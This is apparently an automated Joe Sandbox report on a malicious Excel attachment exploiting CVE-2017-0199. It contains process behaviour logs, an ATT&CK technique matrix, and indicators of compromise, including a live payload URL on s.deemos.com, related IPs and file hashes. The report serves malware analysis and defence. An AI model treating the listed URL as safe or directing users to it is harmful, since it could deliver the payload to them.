Source: C:\Windows\System32\mshta.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11cf-8FD0-00AA00686F13}\InProcServer32Jump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\CommonJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEDirectory created: C:\Program Files\Microsoft Office\root\vfs\Common AppData\Microsoft\Office\Heartbeat\HeartbeatCache.xmlJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEFile opened: C:\Program Files\Microsoft Office\root\vfs\System\MSVCR100.dllJump to behavior
Source: 10131000.0.drInitial sample: OLE indicators vbamacros = False
Source: PO#3311-20250108003.xlsInitial sample: OLE indicators encrypted = True
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: PO#3311-20250108003.xlsStream path 'Workbook' entropy: 7.99101469556 (max. 8.0)
Source: 10131000.0.drStream path 'Workbook' entropy: 7.90614733569 (max. 8.0)
Source: C:\Windows\splwow64.exeWindow / User API: threadDelayed 858Jump to behavior
Source: C:\Windows\splwow64.exeLast function: Thread delayed
Source: C:\Windows\splwow64.exeLast function: Thread delayed
Source: C:\Windows\splwow64.exeThread delayed: delay time: 120000Jump to behavior
Source: C:\Windows\splwow64.exeThread delayed: delay time: 120000Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information queried: ProcessInformationJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information1
Scripting
Valid Accounts13
Exploitation for Client Execution
1
Scripting
1
Process Injection
3
Masquerading
OS Credential Dumping1
Process Discovery
Remote Services1
Email Collection
1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/Job1
DLL Side-Loading
1
DLL Side-Loading
1
Virtualization/Sandbox Evasion
LSASS Memory1
Virtualization/Sandbox Evasion
Remote Desktop ProtocolData from Removable Media1
Ingress Tool Transfer
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
Process Injection
Security Account Manager1
Application Window Discovery
SMB/Windows Admin SharesData from Network Shared Drive2
Non-Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
Obfuscated Files or Information
NTDS1
File and Directory Discovery
Distributed Component Object ModelInput Capture13
Application Layer Protocol
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
DLL Side-Loading
LSA Secrets2
System Information Discovery
SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
PO#3311-20250108003.xls24%ReversingLabsWin32.Exploit.CVE-2017-0199
PO#3311-20250108003.xls100%Joe Sandbox ML
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
https://s.deemos.com/fmGZaVnS?&bush=watchful&grandmom=adjoining&hackwork0%Avira URL Cloudsafe
https://s.deemos.com/fmGZaVnS?&bush=watc0%Avira URL Cloudsafe
NameIPActiveMaliciousAntivirus DetectionReputation
s.deemos.com
14.103.79.10
truefalse
    high
    fp2e7a.wpc.phicdn.net
    192.229.221.95
    truefalse
      high
      NameMaliciousAntivirus DetectionReputation
      https://s.deemos.com/fmGZaVnS?&bush=watchful&grandmom=adjoining&hackworkfalse
      • Avira URL Cloud: safe
      unknown
      NameSourceMaliciousAntivirus DetectionReputation
      https://s.deemos.com/fmGZaVnS?&bush=watcPO#3311-20250108003.xlsfalse
      • Avira URL Cloud: safe
      unknown
      • No. of IPs < 25%
      • 25% < No. of IPs < 50%
      • 50% < No. of IPs < 75%
      • 75% < No. of IPs
      IPDomainCountryFlagASNASN NameMalicious
      14.103.79.10
      s.deemos.comChina
      18002WORLDPHONE-INASNumberforInterdomainRoutingINfalse
      192.3.27.144
      unknownUnited States
      36352AS-COLOCROSSINGUSfalse
      Joe Sandbox version:41.0.0 Charoite
      Analysis ID:1585804
      Start date and time:2025-01-08 09:48:07 +01:00
      Joe Sandbox product:CloudBasic
      Overall analysis duration:0h 5m 12s
      Hypervisor based Inspection enabled:false
      Report type:full
      Cookbook file name:defaultwindowsofficecookbook.jbs
      Analysis system description:Windows 11 23H2 with Office Professional Plus 2021, Chrome 131, Firefox 133, Adobe Reader DC 24, Java 8 Update 431, 7zip 24.09
      Run name:Potential for more IOCs and behavior
      Number of analysed new started processes analysed:26
      Number of new started drivers analysed:0
      Number of existing processes analysed:0
      Number of existing drivers analysed:0
      Number of injected processes analysed:0
      Technologies:
      • HCA enabled
      • EGA enabled
      • GSI enabled (VBA)
      • AMSI enabled
      Analysis Mode:default
      Analysis stop reason:Timeout
      Sample name:PO#3311-20250108003.xls
      Detection:MAL
      Classification:mal64.expl.winXLS@6/14@1/2
      EGA Information:Failed
      HCA Information:
      • Successful, ratio: 100%
      • Number of executed functions: 0
      • Number of non-executed functions: 0
      Cookbook Comments:
      • Found application associated with file extension: .xls
      • Found Word or Excel or PowerPoint or XPS Viewer
      • Attach to Office via COM
      • Active ActiveX Object
      • Active ActiveX Object
      • Scroll down
      • Close Viewer
      • Exclude process from analysis (whitelisted): dllhost.exe, sppsvc.exe, BackgroundTransferHost.exe, SIHClient.exe, appidcertstorecheck.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
      • Excluded IPs from analysis (whitelisted): 204.79.197.203, 52.109.32.97, 52.109.28.47, 52.113.194.132, 52.109.28.48, 23.38.98.83, 23.38.98.84, 23.38.98.96, 23.38.98.102, 23.38.98.97, 23.38.98.98, 23.38.98.68, 23.38.98.87, 51.132.193.105, 23.209.208.71, 52.168.112.66, 20.190.159.2, 172.202.163.200, 20.223.35.26
      • Excluded domains from analysis (whitelisted): osiprod-uks-bronze-azsc-000.uksouth.cloudapp.azure.com, chrome.cloudflare-dns.com, e1324.dscd.akamaiedge.net, odc.officeapps.live.com, slscr.update.microsoft.com, europe.odcsm1.live.com.akadns.net, oneocsp-microsoft-com.a-0003.a-msedge.net, oneocsp.microsoft.com, eur.roaming1.live.com.akadns.net, mobile.events.data.microsoft.com, ecs-office.s-0005.s-msedge.net, roaming.officeapps.live.com, ocsp.digicert.com, login.live.com, ocsp.edge.digicert.com, officeclient.microsoft.com, ukw-azsc-config.officeapps.live.com, c.pki.goog, res-1-tls.cdn.office.net, ecs.office.com, e40491.dscg.akamaiedge.net, client.wns.windows.com, prod.configsvc1.live.com.akadns.net, fd.api.iris.microsoft.com, a-0003.a-msedge.net, uci.cdn.office.net, onedscolprdeus01.eastus.cloudapp.azure.com, ctldl.windowsupdate.com, prod.roaming1.live.com.akadns.net, osiprod-uks-buff-azsc-000.uksouth.cloudapp.azure.com, s-0005-office.config.skype.com, uks-azsc-000.odc.officeapps.live.com, x1.c.lencr.org, uks-az
      • Not all processes where analyzed, report is missing behavior information
      • Report size exceeded maximum capacity and may have missing behavior information.
      • Report size getting too big, too many NtCreateKey calls found.
      • Report size getting too big, too many NtQueryAttributesFile calls found.
      • Report size getting too big, too many NtQueryValueKey calls found.
      • Report size getting too big, too many NtReadVirtualMemory calls found.
      • Report size getting too big, too many NtSetValueKey calls found.
      • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
      • VT rate limit hit for: PO#3311-20250108003.xls
      TimeTypeDescription
      03:50:04API Interceptor901x Sleep call for process: splwow64.exe modified
      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
      14.103.79.10MS100384UTC.xlsGet hashmaliciousUnknownBrowse
        MS100384UTC.xlsGet hashmaliciousUnknownBrowse
          MS100384UTC.xlsGet hashmaliciousUnknownBrowse
            SWIFT.xlsGet hashmaliciousUnknownBrowse
              SWIFT.xlsGet hashmaliciousUnknownBrowse
                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                s.deemos.comMS100384UTC.xlsGet hashmaliciousUnknownBrowse
                • 14.103.79.10
                MS100384UTC.xlsGet hashmaliciousUnknownBrowse
                • 14.103.79.10
                MS100384UTC.xlsGet hashmaliciousUnknownBrowse
                • 14.103.79.10
                SWIFT.xlsGet hashmaliciousUnknownBrowse
                • 14.103.79.10
                SWIFT.xlsGet hashmaliciousUnknownBrowse
                • 14.103.79.10
                fp2e7a.wpc.phicdn.netinvoice-1623385214 pdf.jsGet hashmaliciousPureLog Stealer, RHADAMANTHYS, zgRATBrowse
                • 192.229.221.95
                0a0#U00a0.jsGet hashmaliciousPureLog Stealer, RHADAMANTHYS, zgRATBrowse
                • 192.229.221.95
                3e18bdf74f3caef770a7edcf748bdaf0e6a4a21664e69.exeGet hashmaliciousAsyncRAT, GhostRatBrowse
                • 192.229.221.95
                xmr.exeGet hashmaliciousUnknownBrowse
                • 192.229.221.95
                sasdriver_2.0.20.119.exe_MDE_File_Sample_dc3db78edf1ce84f101e976a9966edb4cf6dcd75.zipGet hashmaliciousUnknownBrowse
                • 192.229.221.95
                PO_62401394_MITech_20250601.exeGet hashmaliciousFormBookBrowse
                • 192.229.221.95
                startuppp.batGet hashmaliciousUnknownBrowse
                • 192.229.221.95
                amiri.EXEGet hashmaliciousUnknownBrowse
                • 192.229.221.95
                CheerSkullness.exeGet hashmaliciousUnknownBrowse
                • 192.229.221.95
                Insomia.exeGet hashmaliciousLummaCBrowse
                • 192.229.221.95
                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                WORLDPHONE-INASNumberforInterdomainRoutingINmiori.m68k.elfGet hashmaliciousUnknownBrowse
                • 14.103.40.215
                MS100384UTC.xlsGet hashmaliciousUnknownBrowse
                • 14.103.79.10
                MS100384UTC.xlsGet hashmaliciousUnknownBrowse
                • 14.103.79.10
                MS100384UTC.xlsGet hashmaliciousUnknownBrowse
                • 14.103.79.10
                SWIFT.xlsGet hashmaliciousUnknownBrowse
                • 14.103.79.10
                SWIFT.xlsGet hashmaliciousUnknownBrowse
                • 14.103.79.10
                Owari.arm.elfGet hashmaliciousUnknownBrowse
                • 14.103.40.223
                ZEjcJZcrXc.elfGet hashmaliciousMiraiBrowse
                • 114.69.243.134
                SecuriteInfo.com.Linux.Siggen.9999.14080.25460.elfGet hashmaliciousMiraiBrowse
                • 14.103.40.233
                AS-COLOCROSSINGUSmiori.ppc.elfGet hashmaliciousUnknownBrowse
                • 192.210.142.114
                9876567899.bat.exeGet hashmaliciousLokibotBrowse
                • 172.245.123.11
                arm5.elfGet hashmaliciousUnknownBrowse
                • 104.168.33.8
                mips.elfGet hashmaliciousUnknownBrowse
                • 104.168.33.8
                mpsl.elfGet hashmaliciousUnknownBrowse
                • 104.168.33.8
                sh4.elfGet hashmaliciousUnknownBrowse
                • 107.175.130.16
                x86_64.elfGet hashmaliciousUnknownBrowse
                • 104.168.33.8
                powerpc.elfGet hashmaliciousUnknownBrowse
                • 104.168.33.8
                arm.elfGet hashmaliciousUnknownBrowse
                • 23.94.242.130
                No context
                No context
                Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                Category:dropped
                Size (bytes):118
                Entropy (8bit):3.5700810731231707
                Encrypted:false
                SSDEEP:3:QaklTlAlXMLLmHlIlFLlmIK/5lTn84vlJlhlXlDHlA6l3l6Als:QFulcLk04/5p8GVz6QRq
                MD5:573220372DA4ED487441611079B623CD
                SHA1:8F9D967AC6EF34640F1F0845214FBC6994C0CB80
                SHA-256:BE84B842025E4241BFE0C9F7B8F86A322E4396D893EF87EA1E29C74F47B6A22D
                SHA-512:F19FA3583668C3AF92A9CEF7010BD6ECEC7285F9C8665F2E9528DBA606F105D9AF9B1DB0CF6E7F77EF2E395943DC0D5CB37149E773319078688979E4024F9DD7
                Malicious:false
                Reputation:high, very likely benign file
                Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.H.e.a.r.t.b.e.a.t.C.a.c.h.e./.>.
                Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                File Type:data
                Category:dropped
                Size (bytes):1584
                Entropy (8bit):2.6928361216532144
                Encrypted:false
                SSDEEP:24:YxIPuk+z7Fl3HyFOqYp2IyoeyjkFP5VQBMQRgYOCE+E7UXOKI5KazYvKISmtzGd2:YxAT+PFKUFM78BMQiYOSVIADK+GTzq
                MD5:CE32F70E720ADCBCA3832170077678F5
                SHA1:DBC905854C8C46BA08DFE3CB040A644C06E76F8D
                SHA-256:DC3B4A2D32EEB0B387AD67EE71194B61AB60818C633DF870DA89F5485D26FACE
                SHA-512:48BC3D3AF66EBA0CBA9941D3D8AA1E4360683DE7EDFB8489EACACA9052CF717136EA7CC6B9E58958B454D265C1A011865421BA818D461A15BFD17453DD14C2F0
                Malicious:false
                Reputation:low
